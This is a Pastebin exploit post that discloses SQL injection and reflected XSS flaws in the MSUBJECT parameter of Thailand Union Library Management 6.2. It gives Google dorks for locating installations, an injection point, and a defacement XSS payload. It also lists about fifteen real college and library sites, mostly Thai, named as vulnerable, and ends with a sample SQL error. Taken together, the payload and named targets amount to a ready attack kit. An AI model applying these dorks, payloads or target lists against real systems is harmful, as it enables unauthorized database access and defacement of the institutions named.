Advertisement
KingSkrupellos

Union Library Management 6.2 XSS SQL Injection

Oct 6th, 2019
286
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.73 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Thailand Union Library Management 6.2 Cross Site Scripting SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 07/10/2019
  7. # Vendor Homepage : ulibm.net - 202.29.234.1/ULIB/index.php
  8. # Software Affected Versions : 6 and 6.2
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Exploit Risk : Medium
  12. # Google Dorks :
  13. inurl:/ULIB/about.php site:ac.th
  14. inurl:/searching.php?SUBJECT= site:ac.th
  15. ULIB inurl:/searching.php?SUBJECT= site:ac.th
  16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  17. Special Elements used in an SQL Command ('SQL Injection') ]
  18. CWE-79 [ Improper Neutralization of Input During
  19. Web Page Generation ('Cross-site Scripting') ]
  20. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  21. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  22. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  23.  
  24. ###################################################################
  25.  
  26. # Impact :
  27. ***********
  28. Thailand Union Library Management 6.2 is prone to an SQL-injection
  29. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  30. it in an SQL query. Exploiting this issue could allow an attacker to compromise the
  31. application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  32. A remote attacker can send a specially crafted request to the vulnerable application and
  33. execute arbitrary SQL commands in application`s database. Further exploitation of this
  34. vulnerability may result in unauthorized data manipulation.
  35. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  36.  
  37. Reflected XSS (or Non-Persistent) :
  38. ***************************************
  39. The server reads data directly from the HTTP request and reflects it back in the HTTP response.
  40. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
  41. to a vulnerable web application, which is then reflected back to the victim and executed by the
  42. web browser. The most common mechanism for delivering malicious content is to include
  43. it as a parameter in a URL that is posted publicly or e-mailed directly to the victim.
  44. URLs constructed in this manner constitute the core of many phishing schemes, whereby
  45. an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects
  46. the attacker's content back to the victim,the content is executed by the victim's browser.
  47.  
  48. ###################################################################
  49.  
  50. # SQL Injection Exploit :
  51. **********************
  52. /ULIB/searching.php?MSUBJECT=[SQL Injection]
  53.  
  54. /PATH-HERE/searching.php?MSUBJECT=[SQL Injection]
  55.  
  56. # Cross Site Scripting XSS Exploit :
  57. ********************************
  58. /ULIB/searching.php?MSUBJECT=1%27%3Cmarquee%3E%3Cfont%20color=
  59. lime%20size=32%3EHacked.By.KingSkrupellos%3C/font%3E%3C/marquee%3E
  60.  
  61. ###################################################################
  62.  
  63. # Example Vulnerable Sites :
  64. *************************
  65. [+] 202.29.234.1/ULIB/searching.php?MSUBJECT=1%27
  66.  
  67. [+] 202.129.46.118/ULIB6NEW/searching.php?MSUBJECT=1%27
  68.  
  69. [+] 110.164.92.12/ULIB/searching.php?MSUBJECT=1%27
  70.  
  71. [+] pckpb.ac.th/ULIB6NEW/searching.php?MSUBJECT=1%27
  72.  
  73. [+] library.tni.ac.th/ulib/searching.php?MSUBJECT=1%27
  74.  
  75. [+] library.kku.ac.th/ulib/searching.php?MSUBJECT=1%27
  76.  
  77. [+] smnc.ac.th/ULIB6/searching.php?MSUBJECT=1%27
  78.  
  79. [+] library.phcsuphan.ac.th/searching.php?MSUBJECT=1%27
  80.  
  81. [+] lib.svit.ac.th/ULIB6/searching.php?MSUBJECT=1%27
  82.  
  83. [+] library.phcsuphan.ac.th/searching.php?MSUBJECT=1%27
  84.  
  85. [+] bcnlp.ac.th/ULIB6/searching.php?MSUBJECT=1%27
  86.  
  87. [+] ulibm.bcnsprnw.ac.th/ULIB6/searching.php?MSUBJECT=1%27
  88.  
  89. [+] library.cvc.ac.th/ulib/searching.php?MSUBJECT=1%27
  90.  
  91. [+] ulib.samakkhi.ac.th/ulib/searching.php?MSUBJECT=1%27
  92.  
  93. [+] ulib.bcnsurin.ac.th/ULIB/searching.php?MSUBJECT=1%27
  94.  
  95. ###################################################################
  96.  
  97. # Example SQL Database Error :
  98. ****************************
  99. mysqli: You have an error in your SQL syntax; check the manual that corresponds t
  100. o your MySQL server version for the right syntax to use near ''1''' at line 1
  101. select * from ignoreword where word='1''
  102. select count(id) as tmpqcount FROM index_db where
  103. ispublish='yes' and 1 AnD ( (subj like '%1'%' ) )
  104. SELECT id,titl,auth,bibrating,mid,remoteindex FROM index_db where
  105. ispublish='yes' and 1 AnD ( (subj like '%1'%' ) ) order by titl asc LIMIT 0,12
  106.  
  107. ###################################################################
  108.  
  109. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  110.  
  111. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement